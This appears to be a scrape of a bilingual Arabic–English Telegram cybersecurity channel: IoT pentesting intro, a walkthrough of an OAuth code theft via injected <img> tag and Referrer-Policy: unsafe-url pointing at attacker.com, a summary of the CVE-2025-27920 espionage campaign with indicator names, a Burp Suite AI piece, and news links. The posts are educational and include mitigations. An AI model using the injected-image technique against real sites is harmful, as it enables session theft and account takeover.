SPIDER1CODE
1.9K subscribers
130 photos
23 videos
12 files
81 links
Spider1Code is the first Arab community that brings together cybersecurity artificial intelligence, and more 🤍
Download Telegram
Forwarded from 𝗕𝗟𝗔𝗖𝗞
Forwarded from 𝗕𝗟𝗔𝗖𝗞
Windows API for Red Team 101 - English.pdf
1000.7 KB
Forwarded from 𝗕𝗟𝗔𝗖𝗞
Forwarded from 𝗕𝗟𝗔𝗖𝗞
Windows API for Red Team 102 English.pdf
588.1 KB
ازيك يا عزيزي اخبارك اي ؟

طبعا انا عارف اني اتاخرت عليك بقالي فتره و بلاك بينزل مكاني بس اوعدك اخلص امتحانات و دراسه عشان الدنيا مش مظبوطه


موضوع النهارده عن iot 🚗

بص يعزيزي iot بداء من ايام التسعينيات من سنه 1999 تحديدا فل قرن 21

بداء علي ايد المهندس Kevin Ashton وهو كان شغال في شركه P&G

كيفين كان بيحاول يربط لاجهزه بينها وبين لانترنت عشان يربط لاجهزه

و اقترح انو يستخدم RFID و بعدها بداء يربط لاشياء بل لانترنت

علي كد نجح ؟

هو نجح ف تاسيس الفكره و اثر علي تطوير RFID و قال جملتو المشهوره

" The Internet of Things has the potential to change the world, just as the Internet did. Maybe even more so "

طيب بعد ما عرفنا عنو هل في تدخل بينو و بين السايبر سكيورتي ؟

اكيد و التراك اسمو

Iot pentest

فل تراك دا لزم تتعلم عن الهارد وير و النت ورك و لاجهزه زي السوفت وير

لزم تتعلم تفهم بروتوكولات زي

MQTT

او

CoAP

او

BLE

او

Zigbee

تتعلم كورس Hardware Hacking

رابط كورس

https://www.classcentral.com/course/youtube-levelup-0x02-hardware-hacking-101-179440
1
Hey my friend, how are you doing?

I know I’ve been away for a while and Black has been taking my place, but I promise I’ll be back fully after I finish my exams and studies — things have just been a bit hectic.

Today’s topic is about IoT! 🚗

So listen, my friend — IoT started back in the 1990s, specifically in 1999, which is in the 21st century.

It all began with engineer Kevin Ashton, who was working at P&G.

Kevin was trying to find a way to connect devices to the internet — basically, making things communicate through the web.

He suggested using RFID, and from there, the idea of connecting objects to the internet really took off.

Did he succeed?

Yes, he succeeded in establishing the core idea, and he had a major impact on developing RFID. He even said his famous quote:

> "The Internet of Things has the potential to change the world, just as the Internet did. Maybe even more so."



So, is there a connection between IoT and Cybersecurity?

Absolutely — and that track is called:

> IoT Pentesting



In this track, you need to learn about hardware, networking, and devices — just like you would with software.

You’ll also need to understand protocols like:

MQTT

CoAP

BLE

Zigbee


And you definitely need to take a course on Hardware Hacking.

Here’s a great free course:

https://www.classcentral.com/course/youtube-levelup-0x02-hardware-hacking-101-179440
2025/5/12
------------------


شات بين بلاك و سبايدر *


بلاك : اخبارك يا سبايدر

سبايدر : في ثغره غريبه حصلت عندي

بلاك : اي هيا

سبايدر : فجاه شخص غريب دخل عندي علي حساب و انا فاتح من كروم

بلاك : شكلك مش شوفت مقال سبايدر سيك عنو

سبايدر : وريني كد ؟

----------------------------------------------------

ازيك يعزيزي عامل اي 🤖❤️

عنوان المقال :

Zero day account takeover

بص يعزيزي المقال دا قالب الدنيا ف التيم لاين لاجنبي و حبيت اشارك معكم بل عربي ف ياريت تشير المحتوي و القناه ❤️

في سنه 2025 شهر 5 الي هو شهر عيد ميلادي 😂❤️

ظهر ثغره تم تبليغه علي هكر ون الثغره بعنوان

Account takeover with on line html


الثغره تعتبر خطيره من نوع Critical

و تنصيفها عالي علي هكر ون

بتشتغل ازاي دي يسبايدر ؟

ببساطه الثغره بتستهدف

( session hijacking )

و بتشتغل عن طريق وضع بايلود في

<img>

واحد في html و عن طريقو يقدر يعمل هجوم OAuth code و يسرق جلسه المستخدم و يعمل takeover

ببساطه المخترق بيدمج ما بين هجومين

( OAUTH Flow )
و
( Referrer Policy Manipulation )

عن طريق img زي ما قولنا و الي بيحصل انه بيتسرب
Tokens او codes

الخاصه ب الجلسه تحديدا جلسه تسجيل الدخول

ببساطه ال
( OAUTH )

بتشتغل عن طريق تسجيلك في موقع زي جوجل مثلا المتصفح بتاعك بيروح علي صفحه تسجيل الدخول الخاصه ب جوجل و بعد ما المستخدم يسجل دخول ...

يبعت المتصفح بتاعو

( authorization code )

في رابط رجعو بتاع url يقوم الموقع لاصلي مبدلو بل access token

* مثال *

https://example.com/callback?code=abc123xyz


طيب اي دخل ال referrer head و police ؟

دخلهم انهم بيتم فيهم الثغره في حال عدم حمايه ليهم بشكل كويس

* مثال *

Referer: https://secure.site.com/auth?code=abc123



كل دا كان بدايه لي شرح الهجوم الهجوم بيتم عن طريق ان المهاجم بيجي بجهاز السيرفر بتاعو تحديدا ب استخدام

( index.php )

السيرفر بتاعو فيدتو انو لما يبعت صوره imp.png مثلا تكون صوره pixel 1x1

"صوره شفافه" طب و بعدين يضيف في الطلب

Referrer-Policy: unsafe-url


عشان يخلي الموقع لو حد طلب الصورة دي من موقعك ابعت الـ referrer كامل بالـ URL وكل الـ query parameters

طيب ازاي بيتم استغلال ؟

المهاجم بعد ما بيعمل كد بينتظر لحد ما يجي عندو صفحه فيها مثلا htmli بيكون فيها xss بس مش بل كامل يقدر يضيف img و يحقن الكود بشكل دا

img src="https://attacker.com/img.png" />


و بعدها الضحيه يجي يسجل الدخول و يتحول علي redirect_uri وهو بيتحول الموقع بيفتح ملف img الي محطوط في السيرفر ملغم و بعدها المتصفح بيطلب الصورة دي ويرسل كامل الـ URL كـ referrer بسبب الهيدر اللي رجعه المهاجم في أول استجابة بعدها المهاجم يلقط الكود الموجود في الـ referrer، ويسرق الجلسة

طيب اي نقاط قوه الهجوم ؟

يعتمد على XSS.

لا يعتمد على Open Redirect

لا يحتاج حتى تنفيذ JavaScript

يعتمد على ثغرة في الـ browser behavior (المتصفح نفسه)

طيب اي الحمايه ؟

لا تستخدم query parameters لتخزين بيانات حساسة زي OAUTH codes، خصوصًا لو في خطر إنه يتم تحميل صور من مصادر غير موثوقة

لو انت صاحب الموقع استخدم referrer-policy كويسه زي

strict-origin-when-cross-origin

أو
no-referrer

أمن صفحاتك ضد HTML injection، مش بس XSS.

لو عندك OAUTH flow، اربط الكود بعنوان الـ IP أو session المؤقتة وما تسمحش بإعادة استخدامه

مثال واقعي للهجوم خطوة بخطوة:

1. الضحية يروح يسجل دخول من https://secure.site.com/auth?code=abc123.


2. المتصفح يعرض صفحة فيها <img src="https://attacker.com/img.png" />.


3. المتصفح يبعت طلب للصورة دي ومعاه:

Referer: https://secure.site.com/auth?code=abc123

4. سيرفر المهاجم يسجل الكود abc123.


5. المهاجم يدخل به على الموقع، كأنه الضحية


مصدر :

https://youtu.be/Pi37YwraPBg?si=uNiEOtOGbZlouYS9
2
2025/5/12

Chat between Black and Spider

Black: What’s up, Spider?

Spider: I just encountered a weird vulnerability.

Black: What is it?

Spider: Out of nowhere, someone managed to log into my account while I was browsing with Chrome.

Black: Sounds like you haven’t seen SpiderSec’s post about it.

Spider: Show me then?


---

Hey my friend, how are you doing? 🤖❤️

Article Title:

Zero Day Account Takeover

Look my friend, this article shook the English cybersecurity timeline, so I thought I’d share it with you in Arabic—please share the content and the channel if you find it useful ❤️

In May 2025, which is also my birthday month 😂❤️
A vulnerability was reported on HackerOne titled:

“Account takeover with only inline HTML”

This vulnerability is considered critical and has a high severity rating on HackerOne.


---

So how does this work, Spider?

Simply put, the vulnerability targets:

Session Hijacking

It works by placing a payload inside an <img> element in HTML. This is then used to launch an OAuth code attack to steal the user's session and take over the account.

The attacker combines two techniques:

1. OAuth Flow


2. Referrer Policy Manipulation



Using an <img> tag as the weapon, what happens is:
Session tokens or login codes are leaked, allowing account takeover.


---

OAuth Flow explained simply:

OAuth works like this:

You try to sign in with a service like Google.

Your browser redirects you to Google’s login page.

Once logged in, Google sends back an authorization code in the redirect URL.

The original site then exchanges this code for an access token.


Example:

https://example.com/callback?code=abc123xyz


---

What’s the role of Referrer headers and policies?

They’re where the vulnerability lies—if not properly protected.

Example:

Referer: https://secure.site.com/auth?code=abc123


---

This is where the attack begins:

The attacker sets up a server—specifically with an index.php file.
The server returns a small 1x1 transparent image, like img.png.
But here's the trick—it includes this header:

Referrer-Policy: unsafe-url

This tells the browser:
“If anyone loads this image from your site, send the full referrer URL including query parameters.”


---

So how is it exploited?

1. The attacker finds a page with HTML injection (not full XSS—just enough to inject an <img>).


2. He injects this tag:



<img src="https://attacker.com/img.png" />

3. The victim signs in using OAuth and gets redirected to a redirect_uri that contains the code in the URL.


4. Before the redirect completes, the browser loads the attacker’s <img> tag.


5. The browser sends a request to the attacker’s server, including the full URL as a Referer header (with the code).


6. The attacker captures the code and uses it to hijack the session.




---

Strengths of the attack:

Does not rely on Open Redirect.

Does not require JavaScript execution.

Exploits browser behavior itself.

Works with only HTML injection, not full XSS.



---

How to protect against it?

Never store sensitive OAuth codes in query parameters—especially if there's a chance of third-party image loading.

Use a secure referrer-policy like:

strict-origin-when-cross-origin

no-referrer


Harden your pages against HTML injection, not just XSS.

For OAuth flows, tie the code to an IP address or temporary session, and don’t allow reuse.



---

Realistic step-by-step attack:

1. Victim signs in from:
https://secure.site.com/auth?code=abc123


2. The site includes:



<img src="https://attacker.com/img.png" />

3. The browser sends:



Referer: https://secure.site.com/auth?code=abc123

4. The attacker’s server logs the code=abc123.


5. Attacker uses the code to log in as the victim.




---

Source:
https://youtu.be/Pi37YwraPBg?si=uNiEOtOGbZlouYS9
1
Forwarded from 『Clippy』
الفرق بين كود مبرمج بايثون محترف
و مبرمج بايثون مبتدئ


لو عايز تقول مثلًا:
city's temp is 34

بالمبتدئ:
city = "Cairo"
temp = 34

print(city, "'s temp is", temp)

بالمحترف:
city = "Cairo"
temp = 34
print(f"{city}'s temp is {temp}")

النتيجة:
Cairo's temp is 34

شايف الفرق في الكود التاني ؟ الكود بقى أنضف وأسهل في القراءة.

ده طبعا مثال بسيط بيكون باين اكتر لو عامل بروجكت كبير
المبرمج المحترف بيستخدم طرق زي

Format


print("{}'s temp is {}".format(city, temp))

لاكن دي برضه طريقه قديمه شويه
في حاليا طرق زي

2. استخدام f-strings
(من بايثون 3.6 وطالع):

python

print(f"{city}'s temp is {temp}")

زي اول مثال فوق.

الخلاصة:

الفرق بين المبتدئ والمحترف مش في الأدوات، بل في طريقة الاستخدام.
عزيزي اخبارك اي 🙈❤️


عايز اقولك قبل ما نبداء شكرا علي دعم رهيب و كل ما دعم كان احسن كل ما كنا احسن و احسن


موضوع المقال :

هجوم حصل علي عراق ( zero day )



في صباح اليوم الي هو النهارده بتاريخ


2025/5/13



حصل اختراق علي مجموعه حساسه و مهمه في العراق عن طريق مجموعه اسمه

Marbled Dust


دول يعزيزي مجموعه مدعومه من تركيا هدفها التجسس و ليهم اسماء تانيه زي

Cosmic Wolf، Sea Turtle، Teal Kurma، UNC1326


المهم الهجوم بداء من شهر ابريل عام 2024 لحد وقت كتابه المقال

حصل انهم اكتشفو ثغره في برنامج

Output Messenger


من اول اصدار 2.0.62 و الي قبلو

اكتشفو استغلال لي cve تحديدا

CVE-2025-27920


ال cve بيتم عن طريق ثغره اسمه

Directory Traversal Vulnerability


الوصف الفني : تسمح للمهاجم عن بُعد و بعد المصادقة بالوصول إلى ملفات النظام أو تنفيذ ملفات غير مصرح بها عبر السيرفر من خلال استغلال ضعف في التحقق من المسارات داخل تطبيق إدارة السيرفر (Server Manager)

و درجه الخطوره معديه 7.5 يعني اعلي من 7.5

( لم يتم نشر تقييم CVSS الرسمي بعد )

بس انا قولت اخمنها يعني 😂


طريقة الاستغلال :

1. الوصول إلى السيرفر كـ"مستخدم مصادق".


2. استغلال ضعف التحقق من مسارات الملفات.


3. إسقاط ملفات ضارة داخل مجلد بدء التشغيل الخاص بالسيرفر، مثل:

OM.vbs

OMServerService.vbs

OMServerService.exe
(backdoor مكتوب بلغة Go)

لاثر لامني :

1 : RCE

2 : Backdoors

3 : Credentials

4 : C2 Servers
مثلا

api.wordinfos[.]com

5 : information disclosure


الملفات الخبيثة :

OM.vbs : سكربت مسؤول عن تشغيل باقي الملفات.

OMServerService.vbs : سكربت يُشغّل الباك دور.

OMServerService.exe : Backdoor بلغة Golang للاتصال بـ C2.

OMClientService.exe : Backdoor يُستخدم في جانب الضحية (client).


الخطوات الموصى بها للحماية :

1. تحديث البرنامج إلى الإصدار 2.0.63 أو أحدث فورًا.


2. مراقبة الاتصالات الصادرة إلى api.wordinfos[.]com.


3. فحص ملفات OM*.vbs و OM*.exe داخل مجلدات بدء التشغيل.


4. مراجعة سجلات الدخول (logs) لاكتشاف أي استخدام مشبوه.


5. تطبيق عزل الشبكة (Segmentation) على الخوادم الحساسة.


هتسالني اي دخل العراق فل موضوع ؟

هرد عليك ببساطه يعزيزي انهم كانو مستهدفين من المجموعه التركيا

لاشخاص المستهدفه كانو زي

أشخاصًا مرتبطين بالقوات الكردية العاملة في العراق



يعني :

المجموعة كانت تستهدف مستخدمين أكراد داخل العراق

(أفراد من الجيش أو الأمن أو الإدارات الكردية)

الأهداف لم تكن عامة، بل مركزة ضمن حملة تجسس إلكتروني

و شكرا علي قرائه المقال 🤍

مصدر :

https://thehackernews.com/2025/05/turkiye-hackers-exploited-output.html
Zero-Day Attack Targets Sensitive Kurdish Entities in Iraq – CVE-2025-27920 Analysis

Date: May 13, 2025
Author: Mohamed Ahmed Abo El-Yazid


---

Dear friend,
Before we begin—thank you for the incredible support. The better the support, the better we become together.


---

Overview of the Attack

On the morning of May 13, 2025, a cyber espionage attack targeting sensitive and critical entities in Iraq was uncovered. The threat actor behind the operation is a Türkiye-affiliated group known as:

Marbled Dust

Also known as: Cosmic Wolf, Sea Turtle, Teal Kurma, UNC1326


This campaign has reportedly been active since April 2024.


---

Vulnerability Information

The attackers exploited a zero-day vulnerability in the enterprise communication platform Output Messenger, specifically affecting versions 2.0.62 and earlier.

CVE: CVE-2025-27920

Type: Directory Traversal Vulnerability

Affected Component: Server Manager application

Risk Level (estimated): 7.5+ (pending CVSS official rating)


Technical Description:

This vulnerability allows authenticated remote attackers to access system files or execute unauthorized scripts by exploiting weak path validation logic inside the Output Messenger Server Manager.


---

Attack Chain Breakdown

1. Initial Access:
Attacker gains access to Output Messenger Server as an authenticated user (possibly via DNS hijacking or typosquatting to steal credentials).


2. Exploitation:
Using CVE-2025-27920, the attacker drops malicious payloads in critical folders like the server startup directory and the Public/Videos folder.


3. Payloads Used:

OM.vbs: Executes other malicious files.

OMServerService.vbs: Triggers the Golang backdoor.

OMServerService.exe: A Golang-based backdoor.

OMClientService.exe: Another Golang backdoor that runs on client devices.





---

Observed Impact

Remote Code Execution (RCE)

Credential Theft

Persistence via Startup Scripts

Backdoor Installation

Communication with C2 server:
api.wordinfos[.]com

Information Disclosure



---

Recommended Mitigations

1. Update Output Messenger to version 2.0.63 or later.


2. Monitor outbound traffic for suspicious domains like api.wordinfos[.]com.


3. Scan startup folders for files named OM*.vbs or OM*.exe.


4. Audit server access logs for any unusual login activity.


5. Apply network segmentation for critical servers.




---

Why Iraq Was Targeted

You may wonder: what does Iraq have to do with this attack?

The answer is simple. The attack specifically targeted Kurdish individuals and entities in Iraq, likely including:

Members of the Kurdish military

Security forces

Administrative organizations


This campaign was not random — it was part of a targeted cyber espionage operation aimed at Kurdish users of Output Messenger operating within Iraq.



Source :

https://thehackernews.com/2025/05/turkiye-hackers-exploited-output.html
محتوي المره الجايه : Next time content
Anonymous Poll
82%
Red team : فريق لاحمر
9%
Blue team : فريق لازرق
9%
Ai : ذكاء اصطناعي
حابب اقول نقطه مهمه انا لما انشر مقال او فيديو و انشرو فكل مكان ف دا بسبب اني بكون عايز الناس تتعلم صح و نكون زي لاجانب او افضل عشان في ناس مفكره اني لما انشر البوست ف قناه شخص يبقي انا معا فل قناه او شئ لا انا لما انشرو بنشرو بنيه علم ينفع الناس و شكرا ⁦
(⁠◍⁠•⁠ᴗ⁠•⁠◍⁠)⁠

----------------------------------------------------

I want to share an important point:
Whenever I publish an article or video and share it everywhere, it's because I genuinely want people to learn the right way and for us to be as good as—if not better than—others around the world.

Some people may think that when I share a post on someone else's channel, it means I’m part of that channel or working with them. But that’s not the case.

I share with the intention of spreading knowledge that benefits people.
Thank you so much!

(◍•ᴗ•◍)
1
﴿يَا أَيُّهَا الَّذِينَ آمَنُوا اتَّقُوا اللَّهَ وَقُولُوا قَوْلًا سَدِيدًا﴾
3
شات بين بلاك و سبايدر 👥


بلاك : الحق البرب سويت اضاف فيها ذكاء اصطناعي

سبايدر : عارف دي قديمه بس مش عارف استخدمها

بلاك : شوفت مقال سبايدر سيك ؟

سبايدر : لا

بلاك : طب شوف كد

----------------------------------------------------


عزيزي القارئ اهلا بيك في مقال جديد

عنوان المقال :
Burpsuite and ai


في تاريخ :

2025/3/15



شركه portsawger المصنعه لي البرب سويت نزلت اول مقال ( " blog " )

عشان اضافه الذكاء الاصطناعي و هنا العالم اتقلب حرفيا

بداء يطلع مقارنات بين اده تانيه اسمه كايدو و البرب سويت بحكم ان لاتنين شغالين بذكاء اصطناعي

طيب يا سبايدر اي هيا البرب سويت ؟

البرب يعزيزي بختصار اده تقوم بقرائه الطلب و الرد الخاص بل موقع

Proxy


اي دا بس كد ؟

شوفت ازاي يعزيزي و انت رايح شاري كورس 9 ساعات شرح البرب سويت

المهم اده البرب سويت مش شرط تعمل كد وبس لا هيا فيها اضافات تانيه زي مثلا

Collaborator


ودي بتعمل localhost علي خفيف بحيس انه تستقبل الطلبات و تشوف زي مثلا http او dns وقتها ممكن تكتشف ثغره

SSRF


و اضافات تانيه كتير بس دا مش موضوع المقال

موضوعنا ان ازاي الشركه تضيف ai و ينجح النجاح الرهيب دا

طيب يا سبايدر انا عندي البرب سويت و مفيش كلام دا

مهو يعزيزي هو موجود بس في نسخه البرو و لاسوء من كد انو بفلوس في نسخه برو

يعني انا بعد ما اشتري النسخه البرو عشان ai القي ai بفلوس ؟

الحقيقه يعزيزي لا بس لو نزلتها كراك و انا مش انصح بدا اه

طيب اي فايده الذكاء الاصطناعي في البرب ؟

ببساطه تخفف عليك من حيث اكتشاف الدومينات و الثغرات

يعني انا ب دوسه واحده اقدر اعمل recon و كمان اكتشف الثغره !!!!

صحيح كلامك يعزيزي عشان كد هتلقي سعرها غالي شويه مقارنه بل عادي

دا غير ان في اضافات الي في

Bapps


مجرد انك تكتب ai في سيرش هتلقي كل ادوات ai بدون نجوم

و دي هتطور الذكاء الاصطناعي يبقي اقوي بس مش تبقي اوفر فيها عشان هتلقي جهازك بقي ضعيف فل استخدام

طيب يا سبايدر لو انا عايز انزلها اجيبها ازاي ؟

اول حاجه يعزيزي و نصيحه اخويه ابعد عن اوتو ماشين غير لما تلقي نفسك متقن لي مانول

تاني حاجه هات ايميل جامعي و ادخل علي موقع بورت سويجر و سجل الجيميل هيجيلك مفتاح البرب سويت برو و معا

10,000

نقطه لي استخدام الذكاء الاصطناعي و عيش انت بقي 🤍

شكرا علي قرائه المقال حبيت اشارك معلومه تفيدكم و عن تجربها و قبل ما تمشي بص علي مصادر :

https://portswigger.net/burp/ai
1
Chat Between Black and Spider

Black: Yo! Did you hear? Burp Suite just added AI features!
Spider: I know, it's old news—but I don’t know how to use it.
Black: Did you check out the SpiderSec article?
Spider: Nope.
Black: Then take a look at this.


---

Dear reader, welcome to a new article!
Title: Burp Suite and AI
Date: 2025/03/15


---

Burp Suite and AI – A New Era Begins

PortSwigger, the company behind Burp Suite, released its first official blog post announcing the integration of Artificial Intelligence (AI) into the tool — and the cybersecurity world went wild.

Soon after, comparisons started popping up between Burp Suite and another AI-powered tool called Kaido, since both now operate using smart automation.


---

So, Spider, what is Burp Suite anyway?

In short, Burp Suite is a proxy tool that intercepts and reads web requests and responses between your browser and a website.

Spider: “Is that all?”

Black: You see? And you bought a 9-hour course just to learn Burp Suite?


---

Of course, Burp does way more than that. It has powerful extensions like:

Collaborator

A built-in service that works like a "lightweight localhost", allowing you to catch incoming interactions like HTTP and DNS requests — great for discovering vulnerabilities like SSRF.

And many other extensions as well… but let’s stay focused on the main topic:


---

So how did AI make such a huge impact in Burp Suite?

Well, Burp Suite’s new AI features are available only in the Pro version, and yes, you have to pay to access them.

Spider: “Wait... so after I buy Burp Suite Pro, I still have to pay for AI?”

Black: Actually, no. The AI feature comes included with the Pro version. But if you're using a cracked version (which we don’t recommend), it won’t work.


---

What does AI do in Burp Suite?

Simply put, it helps you discover domains and vulnerabilities faster.
With one click, you can automate recon and even find potential flaws — making your testing faster and smarter.

That’s one reason the Pro version is more expensive, but it also includes support and updates.


---

And what about BApp Store?

When you go to Extender → BApp Store, just type "AI" in the search bar. You’ll find all available AI tools (with no star ratings yet, since they’re still fresh).

But don’t overuse them — they can be heavy on your system if you run too many at once.


---

How do I get the AI features?

Here’s some advice:

1. Don’t jump into automation until you’ve mastered manual testing.


2. Use a student email and register on PortSwigger’s official site.


3. You’ll receive a free Burp Suite Pro license with 10,000 AI credits to get started.



Enjoy the experience!


---

Thanks for reading!
I wanted to share this info based on my own experience — and don’t forget to check the source:
https://portswigger.net/burp/ai
🏆1
🚨 Critical Fortinet 0-Day Exploited in Attacks!

Hackers are hitting FortiVoice systems in the wild—logging creds, wiping crash logs, scanning networks.

CVE-2025-32756 (CVSS 9.6) affects:
—FortiVoice, FortiMail, FortiNDR
—FortiRecorder, FortiCamera

Exploitable without login via crafted HTTP requests.

🔗 Details: https://thehackernews.com/2025/05/fortinet-patches-cve-2025-32756-zero.html